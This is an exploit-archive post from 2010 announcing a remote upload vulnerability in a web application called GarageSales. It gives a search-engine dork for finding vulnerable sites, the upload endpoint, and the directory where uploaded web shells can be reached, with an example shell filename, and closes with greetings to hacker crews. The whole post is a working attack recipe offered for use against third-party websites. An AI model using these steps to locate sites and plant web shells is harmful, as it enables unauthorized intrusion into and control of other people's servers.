[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GarageSales Remote Upload Vulnerability
# Published : 2010-04-09
# Author : saidinh0
# Previous Title : joomla component huruhelpdesk SQL injection Vulnerability
# Next Title : Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability
# Exploit Title: [GarageSales Remote Upload Vulnerability]
# Date: [06/04/2010]
# Author: [saidinh0]
# Software Link: [N/A]
# Version: [2004/2008]
# Tested on: [Linux/unix]
# CVE : [if exists]
# Code : [N/A]
#Email : cgd@hotmail.com
###################################################
| Intorduction :`|
Hi everybody , This my first bug (Remote Upload Vulnerability) and I wish you like it :p
###################################################
[Dork ]: inurl:post.php?Category=Garage
{exploit} : http://127.0.0.1/post.php?Category=Garage
Example : http://[site]/searchgarage/post.php?Category=Garage
After you have uploaded your shells , you will find it in this Path : http://[site]/up_files/YouRShell.php
Example : http://[site]/searchgarage/up_files/1269813788CrewSheLL.php
###################################################
Greetz To : All my friends :p , Dos02.com Team ,Moroccan H4x0rz
--=-=-=-=-Dos02.com , owned-m.com/cc , vid2all.com -=-=-=-=--=